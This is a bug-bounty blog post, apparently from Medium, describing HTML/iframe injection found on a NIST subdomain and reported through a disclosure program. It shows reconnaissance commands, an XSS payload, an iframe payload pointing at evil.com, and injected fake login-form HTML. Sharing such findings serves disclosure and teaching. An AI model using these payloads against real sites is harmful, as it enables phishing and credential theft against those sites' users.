IFrame injection in one of the domains of the National Institute of Standards and Technology (NIST).

Prince Roy(RoyzSec)
3 min readOct 15, 2023

Har Har Mahadev! This is Prince Roy,a cyber security researcher. Back with another vulnerability finding in one of the domains of the National Institute of Standards and Technology (NIST). Are you excited guys for this?

So, as usual, I first found out all live domains by using Subfinder and httpx and put the bellow command on the Ubuntu terminal.

subfinder -d target.com all | httpx -mc 200 | tee target.txt

Then I used paramspider to fetch all unique URLs But there are lots of domains so it would take time to put every single domain one by one and collect all URLs, and you guys may not know I am so lazy that I can't describe it.

Then one thing came to my mind this is the right time to use ChatGPT and automate this process. After I wrote a bash script with the help of ChatGPT and collected all URLs within 5 minutes.



> "$output_file"

while read -r URL; do
python3 ParamSpider/paramspider.py -d "${URL}" --level high >> "$output_file"
done < "$input_file"

echo "Output saved to $output_file"

In the next step, I used nuclei and nuclei's template.

nuclei -l paramspider_output.txt -t  nuclei-templates/http/vulnerabilities/

Then I found a URL, where one parameter was vulnerable and whatever was put there was reflected on the page. So, I tried this payload after reviewing the source code.

Hello"></a><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>

But this broke my heart because it didn't pop up.

Later, I didn't lose hope and tried the IFrame payloads. Wahh Boom!! it injected………

Used payload:

FUZZ"></a><iframe src="https://evil.com"></iframe>

Then I also tried to create a login form below there [for fun!]

Html code:

FUZZ'"></a><body><div class="container"><h2>Login</h2><form action="login_process.php" method="post"><label for="username">Username:</label><input type="text" id="username" name="username" required><label for="password">Password:</label><input type="password" id="password" name="password" required><input type="submit" value="Login"></form></div></body>

If you want to see the full POC video, here is this video.

Immediately reported it to synack self-responsible vulnerability disclosure program. After 3 hours they accept my report.

Finally, I hope you enjoyed this small blog if you then please press the clapp button it will inspire me to write more blogs for you guys.

I want to thank my mentor Kongsec for his support.

Please follow my Social media accounts for further updates:

Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/

Twitter: https://twitter.com/royzsec

Github: https://github.com/royzsec